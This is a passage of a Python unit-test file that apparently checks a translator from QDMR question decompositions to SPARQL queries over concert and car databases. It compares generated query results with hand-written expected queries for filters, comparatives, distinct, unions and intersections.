GroundingIndex(1,1,"older than 32"): GroundingKey.make_comparative_grounding(">", "32", GroundingKey.make_column_grounding("singer", "Age")),
}
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_to_rdf(correct_sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
@timeout(ONE_TEST_TIMEOUT)
def test_select_column_filter_with_value_in_another_column(self):
"""Select table, filter values based on a value in another column.
The argument of comparative contains reference to a new column.
"""
rdf_graph, schema = get_graph_and_schema("dev", "car_1")
correct_sparql_query = textwrap.dedent("""\
SELECT ?ID
WHERE
{
?ID arc:cars_data:Weight ?Weight.
?ID arc:cars_data:Year ?Year.
FILTER(?Year > ?Weight).
}""")
correct_sparql_query = QueryToRdf(query=correct_sparql_query,
output_cols=[OutputColumnId.from_grounding(GroundingKey.make_table_grounding("cars_data"), schema)])
qdmr = QdmrInstance(["select", "project", "filter"], [["cars"], ["weights", "#1"], ["#1", "years larger than #2"]])
grounding = {
GroundingIndex(0,0,"cars") : GroundingKey.make_table_grounding("cars_data"),
GroundingIndex(1,0,"weights") : GroundingKey.make_column_grounding("cars_data", "Weight"),
GroundingIndex(2,1,"years larger than #2"): GroundingKey.make_comparative_grounding(">", "#2", GroundingKey.make_column_grounding("cars_data", "Year")),
}
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_to_rdf(correct_sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
@timeout(ONE_TEST_TIMEOUT)
def test_select_column_filter_superlative(self):
"""Select table, filter values based on a value in another column - with superlative
"""
rdf_graph, schema = get_graph_and_schema("dev", "concert_singer")
correct_sparql_query = textwrap.dedent("""\
SELECT ?Name_1
WHERE
{
{
SELECT (min(?Age) AS ?min)
WHERE
{
?singer arc:singer:Age ?Age.
}
}
?singer_1 arc:singer:Age ?Age_1.
?singer_1 arc:singer:Name ?Name_1.
FILTER(?Age_1 = ?min).
}""")
correct_sparql_query = QueryToRdf(query=correct_sparql_query,
output_cols=[OutputColumnId.from_grounding(GroundingKey.make_column_grounding("singer", "Name"))])
qdmr = QdmrInstance(["select", "filter"], [["names"], ["#1", "the youngest"]])
grounding = { GroundingIndex(0,0,"names") : GroundingKey.make_column_grounding("singer", "Name"),
GroundingIndex(1,1,"the youngest") : GroundingKey.make_comparative_grounding("min", None, GroundingKey.make_column_grounding("singer", "Age")),
}
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_to_rdf(correct_sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
class TestSelectProjectComparative(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_select_column_project_another_column_compare_value(self):
"""Select table, filter values based on a value in another column based on project-comparative
"""
rdf_graph, schema = get_graph_and_schema("dev", "concert_singer")
correct_sparql_query = textwrap.dedent("""\
SELECT ?Name
WHERE
{
?singer arc:singer:Name ?Name.
?singer arc:singer:Country ?countries.
FILTER(?countries != "France"^^xsd:string)
}""")
correct_sparql_query = QueryToRdf(query=correct_sparql_query,
output_cols=[OutputColumnId.from_grounding(GroundingKey.make_column_grounding("singer", "Name"))])
qdmr = QdmrInstance(["select", "project", "comparative"], [["names"], ["countries", "#1"], ["#1", "#2", "not from France"]])
grounding = { GroundingIndex(1,0,"countries") : GroundingKey.make_column_grounding("singer", "Country"),
GroundingIndex(0,0,"names") : GroundingKey.make_column_grounding("singer", "Name"),
GroundingIndex(2,2,"not from France"): GroundingKey.make_comparative_grounding("!=", "France"),
}
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_to_rdf(correct_sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
@timeout(ONE_TEST_TIMEOUT)
def test_select_column_project_compare_with_another_column(self):
"""Select table, filter values based on a value in another column based on project-comparative
"""
rdf_graph, schema = get_graph_and_schema("dev", "concert_singer")
correct_sparql_query = textwrap.dedent("""\
SELECT ?Country
WHERE
{
?singer arc:singer:Country ?Country.
?singer arc:singer:Name ?Name.
?singer arc:singer:Age ?Age.
FILTER(?Age > 32).
}
GROUP BY ?Country""")
correct_sparql_query = QueryToRdf(query=correct_sparql_query,
output_cols=[OutputColumnId.from_grounding(GroundingKey.make_column_grounding("singer", "Country"))])
qdmr = QdmrInstance(["select", "project", "comparative"], [["countries"], ["names", "#1"], ["#1", "#2", "older than 32"]])
grounding = { GroundingIndex(0,0,"countries") : GroundingKey.make_column_grounding("singer", "Country"),
GroundingIndex(1,0,"names") : GroundingKey.make_column_grounding("singer", "Name"),
GroundingIndex(2,2,"older than 32"): GroundingKey.make_comparative_grounding(">", "32", GroundingKey.make_column_grounding("singer", "Age")),
"distinct": ["#1"],
}
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_to_rdf(correct_sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
@timeout(ONE_TEST_TIMEOUT)
def test_select_column_project_another_column_compare_value_in_the_third_column(self):
"""Select table, filter values based on a value in another column based on project-comparative.
The argument of comparative contains QDMR reference.
"""
rdf_graph, schema = get_graph_and_schema("dev", "car_1")
correct_sparql_query = textwrap.dedent("""\
SELECT ?ID
WHERE
{
?ID arc:cars_data:Weight ?Weight.
?ID arc:cars_data:Year ?Year.
FILTER(?Year > ?Weight).
}""")
correct_sparql_query = QueryToRdf(query=correct_sparql_query,
output_cols=[OutputColumnId.from_grounding(GroundingKey.make_table_grounding("cars_data"), schema)])
qdmr = QdmrInstance(["select", "project", "project", "comparative"],
[["cars"], ["years", "#1"], ["weights", "#1"], ["#1", "#2", "larger than #3"]])
grounding = {
GroundingIndex(0,0,"cars") : GroundingKey.make_table_grounding("cars_data"),
GroundingIndex(1,0,"years") : GroundingKey.make_column_grounding("cars_data", "Year"),
GroundingIndex(2,0,"weights") : GroundingKey.make_column_grounding("cars_data", "Weight"),
GroundingIndex(3,2,"larger than #3"): GroundingKey.make_comparative_grounding(">", "#3"),
}
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_to_rdf(correct_sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
class TestDistinct(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_select_column_distinct(self):
"""When selecting the column we return the items of that column, adding the distinct flag
"""
rdf_graph, schema = get_graph_and_schema("dev", "concert_singer")
correct_sparql_query = textwrap.dedent("""\
SELECT DISTINCT ?countries
WHERE
{
?singer arc:singer:Country ?countries.
}""")
correct_sparql_query = QueryToRdf(query=correct_sparql_query,
output_cols=[OutputColumnId.from_grounding(GroundingKey.make_column_grounding("singer", "Country"))])
qdmr = QdmrInstance(["select"],
[["countries"]])
grounding = {GroundingIndex(0,0,"countries") : GroundingKey.make_column_grounding("singer", "Country")}
grounding["distinct"] = ["#1"]
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_to_rdf(correct_sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
@timeout(ONE_TEST_TIMEOUT)
def test_select_distinct_count(self):
"""Select table, filter values based on a value in another column based on project-comparative
"""
rdf_graph, schema = get_graph_and_schema("dev", "concert_singer")
correct_sparql_query = textwrap.dedent("""\
SELECT (count(DISTINCT ?countries) AS ?count)
WHERE
{
?singer arc:singer:Country ?countries.
}""")
output_col = OutputColumnId.from_grounding(GroundingKey.make_column_grounding("singer", "Country"))
correct_sparql_query = QueryToRdf(query=correct_sparql_query,
output_cols=[OutputColumnId.add_aggregator(output_col, "count")])
qdmr = QdmrInstance(["select", "aggregate"],
[["countries"], ["count", '#1']])
grounding = {GroundingIndex(0,0,"countries") : GroundingKey.make_column_grounding("singer", "Country")}
grounding["distinct"] = ["#1"]
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_to_rdf(correct_sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
@timeout(ONE_TEST_TIMEOUT)
def test_select_column_project_distinct(self):
"""When selecting the column we return the items of that column, adding the distinct flag of the project operator with empty grounding
"""
rdf_graph, schema = get_graph_and_schema("dev", "concert_singer")
correct_sparql_query = textwrap.dedent("""\
SELECT DISTINCT ?countries
WHERE
{
?singer arc:singer:Country ?countries.
}""")
correct_sparql_query = QueryToRdf(query=correct_sparql_query,
output_cols=[OutputColumnId.from_grounding(GroundingKey.make_column_grounding("singer", "Country"))])
qdmr = QdmrInstance(["select", "project"],
[["countries"], ["distinct of", "#1"]])
grounding = {GroundingIndex(0,0,"countries") : GroundingKey.make_column_grounding("singer", "Country")}
grounding["distinct"] = ["#2"]
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_to_rdf(correct_sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
class TestEmptySubqueries(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_filter_empty_result(self):
"""Test projecting the empty output of a subquery
"""
rdf_graph, schema = get_graph_and_schema("dev", "concert_singer")
correct_sparql_query = textwrap.dedent("""\
SELECT ?Name
WHERE
{
?stadiums arc:stadium:Capacity ?Capacity.
FILTER(?Capacity < 0)
?stadiums arc:stadium:Name ?Name.
}""")
correct_sparql_query = QueryToRdf(query=correct_sparql_query,
output_cols=[OutputColumnId.from_grounding(GroundingKey.make_column_grounding("stadium", "Name"))])
qdmr = QdmrInstance(["select", "filter", "project"],
[["stadiums"], ["#1", "cap < 0"], ["name", "#2"]])
grounding = {GroundingIndex(0,0,"stadiums") : GroundingKey.make_table_grounding("stadium"),
GroundingIndex(1,1,"cap < 0") : GroundingKey.make_comparative_grounding("<", "0",
GroundingKey.make_column_grounding("stadium", "Capacity")),
GroundingIndex(2,0,"name") : GroundingKey.make_column_grounding("stadium", "Name")}
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_to_rdf(correct_sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
class TestRefGrounding(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_ref_grounding_comparative(self):
"""Test adding ref grounding in the third arg of COMPARATIVE (2nd arg of FILTER)
"""
rdf_graph, schema = get_graph_and_schema("dev", "concert_singer")
correct_sparql_query = textwrap.dedent("""\
SELECT ?Name
WHERE
{
?stadiums arc:stadium:Capacity ?Capacity.
FILTER(?Capacity < 5000)
?stadiums arc:stadium:Name ?Name.
}""")
correct_sparql_query = QueryToRdf(query=correct_sparql_query,
output_cols=[OutputColumnId.from_grounding(GroundingKey.make_column_grounding("stadium", "Name"))])
qdmr = QdmrInstance(["select", "project", "filter", "project"],
[["stadiums"], ["capacity", "#1"], ["#2", "cap < 5000"], ["name", "#3"]])
grounding = {GroundingIndex(0,0,"stadiums") : GroundingKey.make_table_grounding("stadium"),
GroundingIndex(1,0,"capacity") : GroundingKey.make_column_grounding("stadium", "Capacity"),
GroundingIndex(2,1,"cap < 5000") : GroundingKey.make_comparative_grounding("<", "5000",
GroundingKey.make_reference_grounding("#2")),
GroundingIndex(3,0,"name") : GroundingKey.make_column_grounding("stadium", "Name")}
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_to_rdf(correct_sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
@timeout(ONE_TEST_TIMEOUT)
def test_ref_grounding_group(self):
"""Test adding ref grounding in the third arg of COMPARATIVE (2nd arg of FILTER)
"""
rdf_graph, schema = get_graph_and_schema("dev", "concert_singer")
correct_sparql_query = textwrap.dedent("""\
SELECT ?Capacity
WHERE
{
?stadiums arc:stadium:Capacity ?Capacity.
}""")
correct_sparql_query = QueryToRdf(query=correct_sparql_query,
output_cols=[OutputColumnId.from_grounding(GroundingKey.make_column_grounding("stadium", "Capacity"))])
qdmr = QdmrInstance(["select", "project", "group"],
[["stadiums"], ["capacity", "#1"], ["sum", "#2", "#1"]])
grounding = {GroundingIndex(0,0,"stadiums") : GroundingKey.make_table_grounding("stadium"),
GroundingIndex(1,0,"capacity") : GroundingKey.make_column_grounding("stadium", "Capacity"),
GroundingIndex(2,0,"sum") : GroundingKey.make_reference_grounding("#2"),
}
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_to_rdf(correct_sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
class TestNonInjectiveLink(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_select_project_forward(self):
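"""Follow the singer_in_concert bridge table from concert names to singer names.
"""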
rdf_graph, schema = get_graph_and_schema("dev", "concert_singer")
correct_sparql_query = textwrap.dedent("""\
SELECT ?singer_name
WHERE
{
?pair_id arc:singer_in_concert:Singer_ID ?singer_in_pair_id.
?singer_in_pair_id arc:singer_in_concert:Singer_ID:singer:Singer_ID ?s_id.
?s_id arc:singer:Name ?singer_name.
?pair_id arc:singer_in_concert:concert_ID ?concert_in_pair_id.
?concert_in_pair_id arc:singer_in_concert:concert_ID:concert:concert_ID ?c_id.
?c_id arc:concert:concert_Name ?concert_name.
}""")
correct_sparql_query = QueryToRdf(query=correct_sparql_query,
output_cols=[OutputColumnId.from_grounding(GroundingKey.make_column_grounding("singer", "Name"))])
qdmr = QdmrInstance(["select", "project"], [["concert"], ["singer", "#1"]])
grounding = { GroundingIndex(0,0,"concert") : GroundingKey.make_column_grounding("concert", "concert_Name"),
GroundingIndex(1,0,"singer") : GroundingKey.make_column_grounding("singer", "Name"),
}
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_to_rdf(correct_sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
@timeout(ONE_TEST_TIMEOUT)
def test_select_project_forward_distinct(self):
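"""Same bridge-table traversal, with the distinct flag on the projected singer names.
"""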
rdf_graph, schema = get_graph_and_schema("dev", "concert_singer")
correct_sparql_query = textwrap.dedent("""\
SELECT DISTINCT ?singer_name
WHERE
{
?pair_id arc:singer_in_concert:Singer_ID ?singer_in_pair_id.
?singer_in_pair_id arc:singer_in_concert:Singer_ID:singer:Singer_ID ?s_id.
?s_id arc:singer:Name ?singer_name.
?pair_id arc:singer_in_concert:concert_ID ?concert_in_pair_id.
?concert_in_pair_id arc:singer_in_concert:concert_ID:concert:concert_ID ?c_id.
?c_id arc:concert:concert_Name ?concert_name.
}""")
correct_sparql_query = QueryToRdf(query=correct_sparql_query,
output_cols=[OutputColumnId.from_grounding(GroundingKey.make_column_grounding("singer", "Name"))])
qdmr = QdmrInstance(["select", "project"], [["concert"], ["singer", "#1"]])
grounding = { GroundingIndex(0,0,"concert") : GroundingKey.make_column_grounding("concert", "concert_Name"),
GroundingIndex(1,0,"singer") : GroundingKey.make_column_grounding("singer", "Name"),
"distinct": ["#2"]
}
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_to_rdf(correct_sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
@timeout(ONE_TEST_TIMEOUT)
def test_select_project_backward(self):
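"""Traverse the bridge table in the opposite direction: from singer names to concert names.
"""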
rdf_graph, schema = get_graph_and_schema("dev", "concert_singer")
correct_sparql_query = textwrap.dedent("""\
SELECT ?concert_name
WHERE
{
?pair_id arc:singer_in_concert:Singer_ID ?singer_in_pair_id.
?singer_in_pair_id arc:singer_in_concert:Singer_ID:singer:Singer_ID ?s_id.
?s_id arc:singer:Name ?singer_name.
?pair_id arc:singer_in_concert:concert_ID ?concert_in_pair_id.
?concert_in_pair_id arc:singer_in_concert:concert_ID:concert:concert_ID ?c_id.
?c_id arc:concert:concert_Name ?concert_name.
}""")
correct_sparql_query = QueryToRdf(query=correct_sparql_query,
output_cols=[OutputColumnId.from_grounding(GroundingKey.make_column_grounding("concert", "concert_Name"))])
qdmr = QdmrInstance(["select", "project"], [["singer"], ["concert", "#1"]])
grounding = { GroundingIndex(0,0,"singer") : GroundingKey.make_column_grounding("singer", "Name"),
GroundingIndex(1,0,"concert") : GroundingKey.make_column_grounding("concert", "concert_Name"),
}
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_to_rdf(correct_sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
@timeout(ONE_TEST_TIMEOUT)
def test_select_with_intersect(self):
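"""Intersect the singers that appear in two different concerts (two filters + intersection).
"""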
rdf_graph, schema = get_graph_and_schema("dev", "concert_singer")
correct_sparql_query = textwrap.dedent("""\
SELECT ?singer_name
WHERE
{
?s_id arc:singer:Name ?singer_name.
{
SELECT ?singer_name
WHERE
{
?pair_id arc:singer_in_concert:Singer_ID ?singer_in_pair_id.
?singer_in_pair_id arc:singer_in_concert:Singer_ID:singer:Singer_ID ?s_id.
?s_id arc:singer:Name ?singer_name.
?pair_id arc:singer_in_concert:concert_ID ?concert_in_pair_id.
?concert_in_pair_id arc:singer_in_concert:concert_ID:concert:concert_ID ?c_id.
?c_id arc:concert:concert_Name ?concert_name.
FILTER(?concert_name = "Super bootcamp"^^xsd:string)
}
}
{
SELECT ?singer_name
WHERE
{
?pair_id arc:singer_in_concert:Singer_ID ?singer_in_pair_id.
?singer_in_pair_id arc:singer_in_concert:Singer_ID:singer:Singer_ID ?s_id.
?s_id arc:singer:Name ?singer_name.
?pair_id arc:singer_in_concert:concert_ID ?concert_in_pair_id.
?concert_in_pair_id arc:singer_in_concert:concert_ID:concert:concert_ID ?c_id.
?c_id arc:concert:concert_Name ?concert_name.
FILTER(?concert_name = "Week 1"^^xsd:string)
}
}
}""")
correct_sparql_query = QueryToRdf(query=correct_sparql_query,
output_cols=[OutputColumnId.from_grounding(GroundingKey.make_column_grounding("singer", "Name"))])
qdmr = QdmrInstance(["select", "filter", "filter", "intersection"],
[["singer"], ["#1", "concert name Super bootcamp"], ["#1", "concert name Week 1"], ["#1", "#2", "#3"]])
grounding = { GroundingIndex(0,0,"singer") : GroundingKey.make_column_grounding("singer", "Name"),
GroundingIndex(1,2,"concert name Super bootcamp") : GroundingKey.make_comparative_grounding("=", "Super bootcamp", GroundingKey.make_column_grounding("concert", "concert_Name")),
GroundingIndex(2,2,"concert name Week 1") : GroundingKey.make_comparative_grounding("=", "Week 1", GroundingKey.make_column_grounding("concert", "concert_Name")),
}
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_to_rdf(correct_sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
class TestUnionAsArg(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_union_of_horizontal_unions(self):
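"""Chain horizontal (column-wise) unions so that union outputs feed a later union.
"""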
rdf_graph, schema = get_graph_and_schema("dev", "concert_singer")
correct_sparql_query = textwrap.dedent("""\
SELECT ?c_id ?concert_name ?Theme ?Stadium_ID ?Year
WHERE
{
?c_id arc:concert:concert_Name ?concert_name.
?c_id arc:concert:Theme ?Theme.
?c_id arc:concert:Stadium_ID ?Stadium_ID.
?c_id arc:concert:Year ?Year.
}""")
correct_sparql_query = QueryToRdf(query=correct_sparql_query,
output_cols=[OutputColumnId.from_grounding(GroundingKey.make_column_grounding("concert", "concert_ID")),
OutputColumnId.from_grounding(GroundingKey.make_column_grounding("concert", "concert_Name")),
OutputColumnId.from_grounding(GroundingKey.make_column_grounding("concert", "Theme")),
OutputColumnId.from_grounding(GroundingKey.make_column_grounding("concert", "Stadium_ID")),
OutputColumnId.from_grounding(GroundingKey.make_column_grounding("concert", "Year"))])
qdmr = QdmrInstance(["select", "project", "project", "project", "project", "union", "union", "union"],
[["concert"],
["concert_Name", "#1"],
["Theme", "#1"],
["Stadium_ID", "#1"],
["Year", "#1"],
["#1", "#2"],
["#3", "#4", "#5"],
["#6", "#7"],
])
grounding = { GroundingIndex(0,0,"concert") : GroundingKey.make_table_grounding("concert"),
GroundingIndex(1,0,"concert_Name") : GroundingKey.make_column_grounding("concert", "concert_Name"),
GroundingIndex(2,0,"Theme") : GroundingKey.make_column_grounding("concert", "Theme"),
GroundingIndex(3,0,"Stadium_ID") : GroundingKey.make_column_grounding("concert", "Stadium_ID"),
GroundingIndex(4,0,"Year") : GroundingKey.make_column_grounding("concert", "Year"),
}
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_to_rdf(correct_sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
@timeout(ONE_TEST_TIMEOUT)
def test_union_of_vertical_unions(self):
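"""Take a vertical (row-wise) union of two comparative-filtered copies of the same columns.
"""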
rdf_graph, schema = get_graph_and_schema("dev", "concert_singer")
correct_sparql_query = textwrap.dedent("""\
SELECT ?concert_name ?Theme
WHERE
{
{
?c_id arc:concert:concert_Name ?concert_name.
?c_id arc:concert:Theme ?Theme.
?c_id arc:concert:Year ?Year.
FILTER(?Year = 2014).
}
UNION
{
?c_id arc:concert:concert_Name ?concert_name.
?c_id arc:concert:Theme ?Theme.
?c_id arc:concert:Year ?Year.
FILTER(?Year = 2015).
}
}""")
correct_sparql_query = QueryToRdf(query=correct_sparql_query,
output_cols=[OutputColumnId.from_grounding(GroundingKey.make_column_grounding("concert", "concert_Name")),
OutputColumnId.from_grounding(GroundingKey.make_column_grounding("concert", "Theme"))])
qdmr = QdmrInstance(["select", "project", "project", "union", "comparative", "comparative", "union"],
[["concert"],
["concert_Name", "#1"],
["Theme", "#1"],
["#2", "#3"],
["#4", "#4", "in 2014"],
["#4", "#4", "in 2015"],
["#5", "#6"],
])
grounding = { GroundingIndex(0,0,"concert") : GroundingKey.make_table_grounding("concert"),
GroundingIndex(1,0,"concert_Name") : GroundingKey.make_column_grounding("concert", "concert_Name"),
GroundingIndex(2,0,"Theme") : GroundingKey.make_column_grounding("concert", "Theme"),
GroundingIndex(4,2,"in 2014") : GroundingKey.make_comparative_grounding("=", "2014", GroundingKey.make_column_grounding("concert", "Year")),
GroundingIndex(5,2,"in 2015") : GroundingKey.make_comparative_grounding("=", "2015", GroundingKey.make_column_grounding("concert", "Year")),
}
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_to_rdf(correct_sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
@timeout(ONE_TEST_TIMEOUT)
def test_comparative_after_union(self):
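"""Apply a comparative to the output of a horizontal union.
"""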
rdf_graph, schema = get_graph_and_schema("dev", "concert_singer")
correct_sparql_query = textwrap.dedent("""\
SELECT ?concert_name ?Theme
WHERE
{
?c_id arc:concert:concert_Name ?concert_name.
?c_id arc:concert:Theme ?Theme.
?c_id arc:concert:Year ?Year.
FILTER(?Year = 2014).
}""")
correct_sparql_query = QueryToRdf(query=correct_sparql_query,
output_cols=[OutputColumnId.from_grounding(GroundingKey.make_column_grounding("concert", "concert_Name")),
OutputColumnId.from_grounding(GroundingKey.make_column_grounding("concert", "Theme")),
])
qdmr = QdmrInstance(["select", "project", "union", "comparative"],
[["concert_Name"],
["Theme", "#1"],
["#1", "#2"],
["#3", "#3", "in 2014"],
])
grounding = { GroundingIndex(0,0,"concert_Name") : GroundingKey.make_column_grounding("concert", "concert_Name"),
GroundingIndex(1,0,"Theme") : GroundingKey.make_column_grounding("concert", "Theme"),
GroundingIndex(3,2,"in 2014") : GroundingKey.make_comparative_grounding("=", "2014", GroundingKey.make_column_grounding("concert", "Year")),
}
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_to_rdf(correct_sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
@timeout(ONE_TEST_TIMEOUT)
def test_intersection_after_union(self):
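"""Intersect a union's output with its own comparative-filtered subset.
"""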
rdf_graph, schema = get_graph_and_schema("dev", "concert_singer")
correct_sparql_query = textwrap.dedent("""\
SELECT ?concert_name ?Theme
WHERE
{
?c_id arc:concert:concert_Name ?concert_name.
?c_id arc:concert:Theme ?Theme.
?c_id arc:concert:Year ?Year.
FILTER(?Year = 2014).
}""")
correct_sparql_query = QueryToRdf(query=correct_sparql_query,
output_cols=[OutputColumnId.from_grounding(GroundingKey.make_column_grounding("concert", "concert_Name")),
OutputColumnId.from_grounding(GroundingKey.make_column_grounding("concert", "Theme")),
])
qdmr = QdmrInstance(["select", "project", "union", "comparative", "intersection"],
[["concert_Name"],
